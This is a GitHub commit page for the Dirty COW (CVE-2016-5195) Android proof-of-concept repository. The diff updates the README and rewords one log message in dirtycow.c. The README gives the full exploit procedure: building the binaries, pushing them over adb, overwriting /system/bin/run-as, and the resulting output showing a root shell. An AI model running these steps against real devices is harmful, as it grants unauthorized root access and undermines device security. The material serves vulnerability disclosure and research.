update Readme.md

timwr · Dec 19, 2016 · d794acf · d794acf
1 parent cfd2ff4
commit d794acf
Show file tree

Hide file tree

Showing 2 changed files with 42 additions and 21 deletions.
diff --git a/README.md b/README.md
@@ -1,32 +1,53 @@
 # CVE-2016-5195
 CVE-2016-5195 (dirty cow/dirtycow/dirtyc0w) proof of concept for Android
 
+This repository demonstrates the vulnerability on vulnerable Android devices attached via ADB. 
+It does not disable SELinux (see https://github.com/timwr/CVE-2016-5195/issues/9) or install superuser on the device.
+
 ```
+
 $ make root
-ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk
-make[1]: Entering directory `./CVE-2016-5195'
+ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16
+make[1]: Entering directory '/home/user/dev/git/exploits/CVE-2016-5195'
+[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
+[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
+[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
+[x86_64] Install        : run-as => libs/x86_64/run-as
+[mips64] Install        : dirtycow => libs/mips64/dirtycow
+[mips64] Install        : run-as => libs/mips64/run-as
+[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
+[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
 [armeabi] Install        : dirtycow => libs/armeabi/dirtycow
 [armeabi] Install        : run-as => libs/armeabi/run-as
-make[1]: Leaving directory `./CVE-2016-5195'
-adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
-[100%] /data/local/tmp/dirtycow
-adb push libs/armeabi/run-as /data/local/tmp/run-as
+[x86] Install        : dirtycow => libs/x86/dirtycow
+[x86] Install        : run-as => libs/x86/run-as
+[mips] Install        : dirtycow => libs/mips/dirtycow
+[mips] Install        : run-as => libs/mips/run-as
+make[1]: Leaving directory '/home/user/dev/git/exploits/CVE-2016-5195'
+adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
+[100%] /data/local/tmp/dcow
+adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
 [100%] /data/local/tmp/run-as
-adb shell 'chmod 777 /data/local/tmp/run-as'
-adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
-warning: new file size (9464) and file old size (17944) differ
-
-size 17944
+adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
+dcow /data/local/tmp/run-as /system/bin/run-as
+warning: new file size (17944) and file old size (5544) differ
 
-
-[*] mmap 0xb51e5000
-[*] exploit (patch)
-[*] currently 0xb51e5000=464c457f
-[*] madvise = 0xb51e5000 17944
-[*] madvise = 0 1048576
-[*] /proc/self/mem 1635778560 1048576
-[*] exploited 0xb51e5000=464c457f
+[*] size 5544
+[*] mmap 0xb536b000
+[*] currently 0xb536b000=464c457f
+[*] madvise = 0xb536b000 5544
+[*] madvise = 0 0
+[*] /proc/self/mem 5544 1
+[*] exploited 0xb536b000=464c457f
 adb shell /system/bin/run-as
-running as uid 2000
+uid /system/bin/run-as 2000
 uid 0
+0 u:r:runas:s0
+context 0 u:r:shell:s0
+/system/bin/sh: can't find tty fd: No such device or address
+/system/bin/sh: warning: won't have full job control
+shamu:/ # id
+uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc) context=u:r:shell:s0
+shamu:/ # 
+
 ```
diff --git a/dirtycow.c b/dirtycow.c
@@ -167,7 +167,7 @@ int dcow(int argc, const char * argv[])
 
 	size_t size = st2.st_size;
 	if (st2.st_size != st.st_size) {
-		LOGV("warning: new file size (%lld) and file old size (%lld) differ\n", (unsigned long long)st.st_size, (unsigned long long)st2.st_size);
+		LOGV("warning: new file size (%lld) and destination file size (%lld) differ\n", (unsigned long long)st2.st_size, (unsigned long long)st.st_size);
 		if (st2.st_size > st.st_size) {
 			LOGV("corruption?\n");
 		}